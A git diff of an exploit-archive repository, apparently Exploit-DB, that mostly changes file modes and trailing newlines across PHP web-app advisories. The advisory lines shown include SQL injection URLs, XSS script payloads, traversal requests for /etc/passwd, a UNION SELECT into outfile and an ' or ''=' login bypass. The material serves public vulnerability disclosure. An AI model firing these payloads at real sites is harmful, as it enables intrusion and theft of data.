http://www.example.com/find.php?act=action&reset=yes&detail%5B%5D=[SQL] http://www.example.com/find.php?page=0&act=action&orderby=sortorder&orderdir=[SQL] -http://www.example.com/find.php?page=0&act=action&orderby=[SQL] \ No newline at end of file +http://www.example.com/find.php?page=0&act=action&orderby=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26639.txt b/platforms/php/webapps/26639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26640.txt b/platforms/php/webapps/26640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26641.txt b/platforms/php/webapps/26641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26642.txt b/platforms/php/webapps/26642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26643.txt b/platforms/php/webapps/26643.txt old mode 100755 new mode 100644 index 75147aea9..8b2eb9c7b --- a/platforms/php/webapps/26643.txt +++ b/platforms/php/webapps/26643.txt @@ -6,4 +6,4 @@ This may facilitate the unauthorized viewing of files and unauthorized execution PHP Doc System 1.5.1 and prior versions are reported vulnerable; other versions may also be affected. -http://www.example.com/index.php?show=../File \ No newline at end of file +http://www.example.com/index.php?show=../File \ No newline at end of file diff --git a/platforms/php/webapps/26644.txt b/platforms/php/webapps/26644.txt old mode 100755 new mode 100644 index 978e4854d..7fe982098 --- a/platforms/php/webapps/26644.txt +++ b/platforms/php/webapps/26644.txt @@ -4,4 +4,4 @@ SearchSolutions SearchFeed, RevenuePilot, and Google API are prone to cross-site An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/index.php?REQ=%3Cscript%3Ealert('r0t%20XSS')%3C/script%3ESubmit=Submit \ No newline at end of file +http://www.example.com/index.php?REQ=%3Cscript%3Ealert('r0t%20XSS')%3C/script%3ESubmit=Submit \ No newline at end of file diff --git a/platforms/php/webapps/26645.txt b/platforms/php/webapps/26645.txt old mode 100755 new mode 100644 index d3d26712f..8ae5cdce8 --- a/platforms/php/webapps/26645.txt +++ b/platforms/php/webapps/26645.txt @@ -5,4 +5,4 @@ ASP-Rider is prone to an SQL injection vulnerability. This issue is due to a fai Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. An example Referer header has been supplied: -http://[SQLINJECTION] \ No newline at end of file +http://[SQLINJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/26646.txt b/platforms/php/webapps/26646.txt old mode 100755 new mode 100644 index 4e388d6f8..2579aa02f --- a/platforms/php/webapps/26646.txt +++ b/platforms/php/webapps/26646.txt @@ -5,4 +5,4 @@ PHP Upload Center is prone to a directory traversal vulnerability. This is due t An attacker can exploit this issue to retrieve arbitrary remote files on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. http://www.example.com/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd -http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/26647.txt b/platforms/php/webapps/26647.txt old mode 100755 new mode 100644 index 33b56d0eb..b70aa623e --- a/platforms/php/webapps/26647.txt +++ b/platforms/php/webapps/26647.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Fantastic News 2.1.1 and prior versions are affected. -http://www.example.com/news.php?action=news&category=[SQL] \ No newline at end of file +http://www.example.com/news.php?action=news&category=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26649.txt b/platforms/php/webapps/26649.txt old mode 100755 new mode 100644 index a7e897994..13fab13f5 --- a/platforms/php/webapps/26649.txt +++ b/platforms/php/webapps/26649.txt @@ -8,4 +8,4 @@ Versions 0.904 and 0.910 are vulnerable; other versions may also be affected. http://www.example.com/index.php?action=comments&id=[sq] http://www.example.com/index.php?action=news_list&display_num=[sql] -http://www.example.com/index.php?action=news_list&sortorder=[sql] \ No newline at end of file +http://www.example.com/index.php?action=news_list&sortorder=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/2665.txt b/platforms/php/webapps/2665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26650.txt b/platforms/php/webapps/26650.txt old mode 100755 new mode 100644 index 11bb2f334..b8d7d2b63 --- a/platforms/php/webapps/26650.txt +++ b/platforms/php/webapps/26650.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 2.0 and prior are vulnerable; other versions may also be affected. http://www.example.com/?action=showcat&idcat=[SQL] -http://www.example.com/?action=[SQL] \ No newline at end of file +http://www.example.com/?action=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26651.txt b/platforms/php/webapps/26651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26652.txt b/platforms/php/webapps/26652.txt old mode 100755 new mode 100644 index 9eb529624..d88568e8e --- a/platforms/php/webapps/26652.txt +++ b/platforms/php/webapps/26652.txt @@ -10,4 +10,4 @@ http://www.example.com/merchants/index.php?tm_userid=_&tm_orderid=&tm_transt ype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filtered=1&md=Affiliate_Merchants_Views_TransactionManager&type=all&list_page=0&action=&sortby=ip&sortorder=[SQL] http://www.example.com/merchants/index.php?um_name=&um_surname=&um_aid=&um_s -tatus=_&numrows=20&filtered=1&md=Affiliate_Merchants_Views_AffiliateManager&list_page=0&sortby=a.surname&action=&sortorder=[SQL] \ No newline at end of file +tatus=_&numrows=20&filtered=1&md=Affiliate_Merchants_Views_AffiliateManager&list_page=0&sortby=a.surname&action=&sortorder=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26653.txt b/platforms/php/webapps/26653.txt old mode 100755 new mode 100644 index 361b941a8..f57738f58 --- a/platforms/php/webapps/26653.txt +++ b/platforms/php/webapps/26653.txt @@ -7,4 +7,4 @@ A successful exploit could allow an attacker to compromise the application, acce GhostScripter Amazon Shop 5.0.0 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/search.php?query=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&mode=all&imageField.x=21&imageField.y=4 \ No newline at end of file +http://www.example.com/search.php?query=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&mode=all&imageField.x=21&imageField.y=4 \ No newline at end of file diff --git a/platforms/php/webapps/26654.txt b/platforms/php/webapps/26654.txt old mode 100755 new mode 100644 index 9c2a3a74b..1b6873ec9 --- a/platforms/php/webapps/26654.txt +++ b/platforms/php/webapps/26654.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 1.0.0 and prior are vulnerable; other versions may also be affected. -http://www.example.com/category.php?action=view&id=[SQL] \ No newline at end of file +http://www.example.com/category.php?action=view&id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26655.txt b/platforms/php/webapps/26655.txt old mode 100755 new mode 100644 index 92afb186e..c41ef559a --- a/platforms/php/webapps/26655.txt +++ b/platforms/php/webapps/26655.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 4.1.3 and prior are vulnerable; other versions may also be affected. -http://www.example.com/calendar.php?display=event&id=[SQL] \ No newline at end of file +http://www.example.com/calendar.php?display=event&id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26656.txt b/platforms/php/webapps/26656.txt old mode 100755 new mode 100644 index b8791f744..f67ab9778 --- a/platforms/php/webapps/26656.txt +++ b/platforms/php/webapps/26656.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 2.1b is vulnerable; other versions may also be affected. -http://www.example.com/knowledgebase?qid=[SQL] \ No newline at end of file +http://www.example.com/knowledgebase?qid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26657.txt b/platforms/php/webapps/26657.txt old mode 100755 new mode 100644 index 90dd32536..1bb5f4d82 --- a/platforms/php/webapps/26657.txt +++ b/platforms/php/webapps/26657.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.3b is vulnerable; other versions may also be affected. -http://www.example.com/blog?msg=[SQL] \ No newline at end of file +http://www.example.com/blog?msg=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26658.txt b/platforms/php/webapps/26658.txt old mode 100755 new mode 100644 index f0e3bca29..2d76e7432 --- a/platforms/php/webapps/26658.txt +++ b/platforms/php/webapps/26658.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 2.3c is vulnerable; other versions may also be affected. -http://www.example.com/ringmaker?start=[SQL] \ No newline at end of file +http://www.example.com/ringmaker?start=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26659.txt b/platforms/php/webapps/26659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2666.txt b/platforms/php/webapps/2666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26660.txt b/platforms/php/webapps/26660.txt old mode 100755 new mode 100644 index c25ff0978..9caa5c791 --- a/platforms/php/webapps/26660.txt +++ b/platforms/php/webapps/26660.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 1.1 and prior are vulnerable; other versions may also be affected. -http://www.example.com/index.php?SEARCH_KEYS=&CATEGORY_ID=[SQL] \ No newline at end of file +http://www.example.com/index.php?SEARCH_KEYS=&CATEGORY_ID=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26661.txt b/platforms/php/webapps/26661.txt old mode 100755 new mode 100644 index 8e702b1c1..4084c9ab4 --- a/platforms/php/webapps/26661.txt +++ b/platforms/php/webapps/26661.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 1.1 and prior are vulnerable; other versions may also be affected. -http://www.example.com/survey.php?SURVEY_ID=[SQL] \ No newline at end of file +http://www.example.com/survey.php?SURVEY_ID=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26662.php b/platforms/php/webapps/26662.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26663.txt b/platforms/php/webapps/26663.txt old mode 100755 new mode 100644 index 2dded189e..2bc8c3320 --- a/platforms/php/webapps/26663.txt +++ b/platforms/php/webapps/26663.txt @@ -28,4 +28,4 @@ http://www.example.com/customers/zone_files.php?plan_id=35&domain=[SQL] http://www.example.com/customers/htaccess.php?plan_id=[SQL] http://www.example.com/customers/htaccess.php?plan_id=35&domain=[SQL] http://www.example.com/customers/software.php?plan_id=[SQL] -http://www.example.com/customers/software.php?plan_id=35&domain=[SQL] \ No newline at end of file +http://www.example.com/customers/software.php?plan_id=35&domain=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26667.txt b/platforms/php/webapps/26667.txt old mode 100755 new mode 100644 index 770ec5c73..ace3885b3 --- a/platforms/php/webapps/26667.txt +++ b/platforms/php/webapps/26667.txt @@ -5,4 +5,4 @@ SocketKB is prone to an SQL injection vulnerability. This issue is due to a fail Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/?__f=category&node=[SQL] -http://www.example.com/?__f=rating_add&art_id=[SQL] \ No newline at end of file +http://www.example.com/?__f=rating_add&art_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26668.txt b/platforms/php/webapps/26668.txt old mode 100755 new mode 100644 index 57951388b..af4e34ec3 --- a/platforms/php/webapps/26668.txt +++ b/platforms/php/webapps/26668.txt @@ -9,4 +9,4 @@ Note that this issue may also be leveraged to read arbitrary files on an affecte phpAlbum 0.2.3 and prior versions are vulnerable. http://www.example.com/main.php?cmd=../ -http://www.example.com/main.php?cmd=album&var1=../ \ No newline at end of file +http://www.example.com/main.php?cmd=album&var1=../ \ No newline at end of file diff --git a/platforms/php/webapps/26669.txt b/platforms/php/webapps/26669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2667.txt b/platforms/php/webapps/2667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26670.txt b/platforms/php/webapps/26670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26671.txt b/platforms/php/webapps/26671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26672.txt b/platforms/php/webapps/26672.txt old mode 100755 new mode 100644 index c37bfa730..615df9a9d --- a/platforms/php/webapps/26672.txt +++ b/platforms/php/webapps/26672.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 1.1 and prior are reported to be vulnerable; other versions may also be affected. -http://www.example.com/profiles.php?cid=[SQL] \ No newline at end of file +http://www.example.com/profiles.php?cid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26673.txt b/platforms/php/webapps/26673.txt old mode 100755 new mode 100644 index 1a5384941..59c24d24b --- a/platforms/php/webapps/26673.txt +++ b/platforms/php/webapps/26673.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Softbiz FAQ 1.1 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/index.php?cid=[SQL] \ No newline at end of file +http://www.example.com/index.php?cid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26674.txt b/platforms/php/webapps/26674.txt old mode 100755 new mode 100644 index 685ddd084..18936fac9 --- a/platforms/php/webapps/26674.txt +++ b/platforms/php/webapps/26674.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Softbiz FAQ 1.1 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/faq_qanda.php?id=[SQL] \ No newline at end of file +http://www.example.com/faq_qanda.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26675.txt b/platforms/php/webapps/26675.txt old mode 100755 new mode 100644 index 569bd1734..02a6cd935 --- a/platforms/php/webapps/26675.txt +++ b/platforms/php/webapps/26675.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Softbiz FAQ 1.1 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/refer_friend.php?id=[SQL] \ No newline at end of file +http://www.example.com/refer_friend.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26676.txt b/platforms/php/webapps/26676.txt old mode 100755 new mode 100644 index 5194eef12..c9e0c1ae6 --- a/platforms/php/webapps/26676.txt +++ b/platforms/php/webapps/26676.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Softbiz FAQ 1.1 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/print_article.php?id=[SQL] \ No newline at end of file +http://www.example.com/print_article.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26677.txt b/platforms/php/webapps/26677.txt old mode 100755 new mode 100644 index 4881be415..a727ba926 --- a/platforms/php/webapps/26677.txt +++ b/platforms/php/webapps/26677.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Softbiz FAQ 1.1 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/add_comment.php?id=[SQL] \ No newline at end of file +http://www.example.com/add_comment.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26678.txt b/platforms/php/webapps/26678.txt old mode 100755 new mode 100644 index be1bad380..0f321a623 --- a/platforms/php/webapps/26678.txt +++ b/platforms/php/webapps/26678.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 3.0 and prior are reported to be vulnerable; other versions may also be affected. -http://www.example.com/answer.php?id=[SQL] \ No newline at end of file +http://www.example.com/answer.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26679.txt b/platforms/php/webapps/26679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2668.htm b/platforms/php/webapps/2668.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26680.txt b/platforms/php/webapps/26680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26681.txt b/platforms/php/webapps/26681.txt old mode 100755 new mode 100644 index f730a0ec2..77f841352 --- a/platforms/php/webapps/26681.txt +++ b/platforms/php/webapps/26681.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 1.2.0 and prior are reported to be vulnerable; other versions may also be affected. -http://www.example.com/memberlist.php?action=profile&id=1[SQL] \ No newline at end of file +http://www.example.com/memberlist.php?action=profile&id=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26682.txt b/platforms/php/webapps/26682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26683.txt b/platforms/php/webapps/26683.txt old mode 100755 new mode 100644 index bc1e46f6f..9a0527819 --- a/platforms/php/webapps/26683.txt +++ b/platforms/php/webapps/26683.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 1.3 and prior are reported to be vulnerable; other versions may also be affected. -http:///okiraku.php?lang=&day_id=[SQL] \ No newline at end of file +http:///okiraku.php?lang=&day_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26684.txt b/platforms/php/webapps/26684.txt old mode 100755 new mode 100644 index d22118d09..17446ba0b --- a/platforms/php/webapps/26684.txt +++ b/platforms/php/webapps/26684.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 2.0 and prior are reported to be vulnerable; other versions may also be affected. -http://www.example.com//index.php?d=28&m=[SQL] \ No newline at end of file +http://www.example.com//index.php?d=28&m=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26685.txt b/platforms/php/webapps/26685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26686.txt b/platforms/php/webapps/26686.txt old mode 100755 new mode 100644 index e2d721798..e2bd47369 --- a/platforms/php/webapps/26686.txt +++ b/platforms/php/webapps/26686.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions v1 and prior are reported to be vulnerable; other versions may also be affected. -http://www.example.com/content.php?cid=[SQL] \ No newline at end of file +http://www.example.com/content.php?cid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26687.txt b/platforms/php/webapps/26687.txt old mode 100755 new mode 100644 index bbf6bab51..ce8e00d2b --- a/platforms/php/webapps/26687.txt +++ b/platforms/php/webapps/26687.txt @@ -10,4 +10,4 @@ Version 1.0.1. is vulnerable; other versions may also be affected. http://www.example.com/webcalendar/activity_log.php?startid=%2527 http://www.example.com/webcalendar/activity_log.php?startid=%27 -http://www.example.com/webcalendar/activity_log.php?startid=' \ No newline at end of file +http://www.example.com/webcalendar/activity_log.php?startid=' \ No newline at end of file diff --git a/platforms/php/webapps/26688.php b/platforms/php/webapps/26688.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26689.txt b/platforms/php/webapps/26689.txt old mode 100755 new mode 100644 index f649ee4b5..ecf13cba5 --- a/platforms/php/webapps/26689.txt +++ b/platforms/php/webapps/26689.txt @@ -4,4 +4,4 @@ DotClear is prone to an SQL injection vulnerability. This issue is due to a fail Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -dc_xd=siegfried'/**/UNION/**/SELECT user_id,user_pseudo,user_nom,user_email from dc_user into outfile "/var/www/blah"/* \ No newline at end of file +dc_xd=siegfried'/**/UNION/**/SELECT user_id,user_pseudo,user_nom,user_email from dc_user into outfile "/var/www/blah"/* \ No newline at end of file diff --git a/platforms/php/webapps/2669.php b/platforms/php/webapps/2669.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26691.txt b/platforms/php/webapps/26691.txt old mode 100755 new mode 100644 index b266add21..9975a0557 --- a/platforms/php/webapps/26691.txt +++ b/platforms/php/webapps/26691.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability to influence or misrepresent ho WebCalendar 1.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to] \ No newline at end of file +http://www.example.com/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to] \ No newline at end of file diff --git a/platforms/php/webapps/26692.txt b/platforms/php/webapps/26692.txt old mode 100755 new mode 100644 index 0b0a547c2..d5ba12f5f --- a/platforms/php/webapps/26692.txt +++ b/platforms/php/webapps/26692.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Versions 6.0 and prior are vulnerable; other versions may also be affected. -http://www.example.com/search/extremesearch.php?search=%3Cscript%3Ealert%28%27r0t+XSS%27%29%3C%2Fscript%3E&lang= \ No newline at end of file +http://www.example.com/search/extremesearch.php?search=%3Cscript%3Ealert%28%27r0t+XSS%27%29%3C%2Fscript%3E&lang= \ No newline at end of file diff --git a/platforms/php/webapps/26693.txt b/platforms/php/webapps/26693.txt old mode 100755 new mode 100644 index f1d027352..fe05fd9cf --- a/platforms/php/webapps/26693.txt +++ b/platforms/php/webapps/26693.txt @@ -4,4 +4,4 @@ Trac is prone to an SQL injection vulnerability. This issue is due to a failure Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/trac/query?group=/* \ No newline at end of file +http://www.example.com/trac/query?group=/* \ No newline at end of file diff --git a/platforms/php/webapps/26694.txt b/platforms/php/webapps/26694.txt old mode 100755 new mode 100644 index 46e6f7468..7b2daf5df --- a/platforms/php/webapps/26694.txt +++ b/platforms/php/webapps/26694.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br phpMyChat 0.14.5 is vulnerable; other versions may also be affected. -http://www.example.com/phpmychat/chat/config/start_page.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1 \ No newline at end of file +http://www.example.com/phpmychat/chat/config/start_page.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1 \ No newline at end of file diff --git a/platforms/php/webapps/26695.txt b/platforms/php/webapps/26695.txt old mode 100755 new mode 100644 index 9560e2db0..a9886ed1d --- a/platforms/php/webapps/26695.txt +++ b/platforms/php/webapps/26695.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br phpMyChat 0.14.5 is vulnerable; other versions may also be affected. -http://www.example.com/phpmychat/chat/config/style.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1 \ No newline at end of file +http://www.example.com/phpmychat/chat/config/style.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1 \ No newline at end of file diff --git a/platforms/php/webapps/26696.txt b/platforms/php/webapps/26696.txt old mode 100755 new mode 100644 index 302543162..13cbb4d83 --- a/platforms/php/webapps/26696.txt +++ b/platforms/php/webapps/26696.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br phpMyChat 0.14.5 is vulnerable; other versions may also be affected. -http://www.example.com/phpmychat/chat/users_popupL.php?From="><script>alert(29837274289742472);</script>>&L=english&LastCheck=1133281246&B=0 \ No newline at end of file +http://www.example.com/phpmychat/chat/users_popupL.php?From="><script>alert(29837274289742472);</script>>&L=english&LastCheck=1133281246&B=0 \ No newline at end of file diff --git a/platforms/php/webapps/26697.php b/platforms/php/webapps/26697.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26698.txt b/platforms/php/webapps/26698.txt old mode 100755 new mode 100644 index 478449e7c..02836de69 --- a/platforms/php/webapps/26698.txt +++ b/platforms/php/webapps/26698.txt @@ -4,4 +4,4 @@ NetClassifieds is prone to multiple SQL-injection vulnerabilities because the ap A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/gallery.php?CatID=[SQL] \ No newline at end of file +http://www.example.com/gallery.php?CatID=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26699.txt b/platforms/php/webapps/26699.txt old mode 100755 new mode 100644 index 8feb61fc5..941011100 --- a/platforms/php/webapps/26699.txt +++ b/platforms/php/webapps/26699.txt @@ -4,4 +4,4 @@ NetClassifieds is prone to multiple SQL-injection vulnerabilities because the ap A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/ViewItem.php?ItemNum=[SQL] \ No newline at end of file +http://www.example.com/ViewItem.php?ItemNum=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2670.php b/platforms/php/webapps/2670.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26706.txt b/platforms/php/webapps/26706.txt old mode 100755 new mode 100644 index f06dbfc62..cd0e4afd0 --- a/platforms/php/webapps/26706.txt +++ b/platforms/php/webapps/26706.txt @@ -4,4 +4,4 @@ PHP-Fusion is prone to an SQL injection vulnerability. This issue is due to a fa Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20/%20Sort \ No newline at end of file +http://www.example.com/messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20/%20Sort \ No newline at end of file diff --git a/platforms/php/webapps/26707.txt b/platforms/php/webapps/26707.txt old mode 100755 new mode 100644 index c9b740cd5..100373cf5 --- a/platforms/php/webapps/26707.txt +++ b/platforms/php/webapps/26707.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos The following example is available: Username : ' or ''=' -Password : ' or ''=' \ No newline at end of file +Password : ' or ''=' \ No newline at end of file diff --git a/platforms/php/webapps/26713.txt b/platforms/php/webapps/26713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26714.txt b/platforms/php/webapps/26714.txt old mode 100755 new mode 100644 index a38320c61..3a76a7979 --- a/platforms/php/webapps/26714.txt +++ b/platforms/php/webapps/26714.txt @@ -4,4 +4,4 @@ phpYellowTM is prone to multiple SQL injection vulnerabilities. These issues are Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/print_me.php?ckey=[SQL] \ No newline at end of file +http://www.example.com/print_me.php?ckey=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26715.txt b/platforms/php/webapps/26715.txt old mode 100755 new mode 100644 index c7c52e57d..29b18f2a8 --- a/platforms/php/webapps/26715.txt +++ b/platforms/php/webapps/26715.txt @@ -20,4 +20,4 @@ http://www.example.com/property.php?action=search&city_id=&zip_code= &price=[SQL]&property_type_id=&submit=submit http://www.example.com/property.php?action=search&city_id=[SQL]&zip_code= -&price=&property_type_id=&submit=submit \ No newline at end of file +&price=&property_type_id=&submit=submit \ No newline at end of file diff --git a/platforms/php/webapps/26717.txt b/platforms/php/webapps/26717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26718.txt b/platforms/php/webapps/26718.txt old mode 100755 new mode 100644 index eb9ed44a5..3d9b61b74 --- a/platforms/php/webapps/26718.txt +++ b/platforms/php/webapps/26718.txt @@ -7,4 +7,4 @@ These vulnerabilities could permit remote attackers to pass malicious input to d eCommerce Enterprise Edition 2.1 and prior and eCommerce Home Edition are vulnerable to these issues. http://www.example.com/index.php?action=ViewGroups&grp=[SQL] -http://www.example.com/index.php?action=ViewCategories&cat=[SQL] \ No newline at end of file +http://www.example.com/index.php?action=ViewCategories&cat=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26719.txt b/platforms/php/webapps/26719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26720.txt b/platforms/php/webapps/26720.txt old mode 100755 new mode 100644 index 2f098410a..3dedde2eb --- a/platforms/php/webapps/26720.txt +++ b/platforms/php/webapps/26720.txt @@ -8,4 +8,4 @@ http://www.example.com/ls.php?lang=en&action=list&start=[SQL] http://www.example.com/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=&infield=&search_order=[SQL] http://www.example.com/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=[SQL] http://www.example.com/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=[SQL] -http://www.example.com/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=[SQL] \ No newline at end of file +http://www.example.com/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26722.txt b/platforms/php/webapps/26722.txt old mode 100755 new mode 100644 index 270a52c3b..7d4a75b80 --- a/platforms/php/webapps/26722.txt +++ b/platforms/php/webapps/26722.txt @@ -5,4 +5,4 @@ Hobosworld HobSR is prone to multiple SQL injection vulnerabilities. These issue Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/view.php?arrange=[SQL] -http://www.example.com/view.php?p=[SQL] \ No newline at end of file +http://www.example.com/view.php?p=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26723.txt b/platforms/php/webapps/26723.txt old mode 100755 new mode 100644 index ef88fd739..0e9aa5854 --- a/platforms/php/webapps/26723.txt +++ b/platforms/php/webapps/26723.txt @@ -6,4 +6,4 @@ This issue is due to a failure in the application to properly sanitize user-supp This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. -http://www.example.com/index.php?name=&price_from=&price_to=&city=&state=SC&mls=[SQL]&bathroom=-1&bedrooms=-1&go=search&results=1 \ No newline at end of file +http://www.example.com/index.php?name=&price_from=&price_to=&city=&state=SC&mls=[SQL]&bathroom=-1&bedrooms=-1&go=search&results=1 \ No newline at end of file diff --git a/platforms/php/webapps/26724.txt b/platforms/php/webapps/26724.txt old 